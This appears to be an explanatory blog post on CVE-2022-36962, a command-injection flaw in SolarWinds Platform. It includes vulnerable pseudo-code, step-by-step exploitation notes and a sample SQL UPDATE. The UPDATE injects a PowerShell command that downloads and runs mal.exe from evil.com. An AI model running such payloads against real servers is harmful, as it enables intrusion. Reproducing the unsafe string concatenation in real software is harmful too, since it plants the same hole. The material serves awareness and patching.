CVE-2022-36962 - Remote Command Injection in SolarWinds Platform Explained

---

Introduction

In late 2022, a significant vulnerability was discovered in the SolarWinds Platform: CVE-2022-36962. This flaw openly allowed remote attackers with control over the SolarWinds backend database to execute arbitrary system commands—posing a high risk for those using SolarWinds for network or infrastructure monitoring.

In this in-depth post, we will explain, step by step, what CVE-2022-36962 is, how it works, who is at risk, and provide a simplified code example. All information is original, simplified for non-expert readers, and directly relevant for those with responsibility for SolarWinds deployments.

What is CVE-2022-36962?

This vulnerability affects various versions of the SolarWinds Platform (formerly Orion), up to version 2022.3.5.

Vulnerability type: Command Injection

- Location: Application logic that allows data from the SolarWinds database to be passed unsafely to the system shell.
- Attack scenario: Attacker who has direct access or admin rights on the SolarWinds database (e.g., SQL Server) can inject malicious payloads that are executed on the server running SolarWinds.

References

- NVD Entry
- SolarWinds Security Advisory

How Dangerous is It?

- Remote Code Execution: Malicious actors can run any command as the SYSTEM or administrative user on the SolarWinds server.
- Widespread Damage: If SolarWinds is deployed in a sensitive network, attackers can hop to other systems.
- Prerequisite: The attacker must have admin database rights. Often, attackers obtain these after a successful phishing attack, weak passwords, or exploiting other vulnerabilities.

How Does the Exploit Work?

Internally, SolarWinds keeps configurations and data in its SQL database. Certain features fetch fields (like device names, event details, script payloads) and unsafely concatenate database values into command strings—then execute them on the Windows server using cmd.exe or PowerShell.

Suppose the code retrieves a field from the SQL database (such as a device name)

// .NET pseudo-code for illustration
string deviceName = db.GetField("deviceName");
string command = "ping " + deviceName;
Process.Start("cmd.exe", "/c " + command);

If an attacker inserts this value into deviceName in the database

127...1 && calc.exe

The command built and run by the system becomes

ping 127...1 && calc.exe

Result: The server pings 127...1 (localhost), then pops open Calculator—which could be any malicious code instead.

Access the database. The attacker logs into the SQL Server backing SolarWinds as an admin.

2. Find a vulnerable field that eventually is executed, e.g., a device name, custom field, or scripting placeholder.

Inject a payload like 127...1 && powershell -EncodedCommand <base64-malicious-payload>

4. Wait for SolarWinds Platform to process and execute the field during its next scheduled task, trigger, or script.

Sample SQL Inject Code

UPDATE Nodes
SET NodeName = '127...1 && powershell -Command "Invoke-WebRequest http://evil.com/mal.exe -OutFile C:\mal.exe; Start-Process C:\mal.exe"'
WHERE NodeID = 4;

After SolarWinds processes this node, it will both ping localhost and download/run an attacker's tool.

Resources

- SolarWinds Official Security Advisory (PDF)
- NVD CVE Detail
- SolarWinds Support Portal
- MITRE CVE page

Conclusion

CVE-2022-36962 is a serious flaw in the SolarWinds Platform that turns SQL database control into remote SYSTEM-level code execution. While not an internet-facing bug, the risk is enormous if your database is compromised. Stay secure by upgrading, limiting access, and auditing usage today!

If you have further questions or need help with hardening your SolarWinds setup, don't hesitate to comment or reach out.


*This post is original and created for easy understanding of CVE-2022-36962. Stay safe and patch your systems!*

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 21:37:00 UTC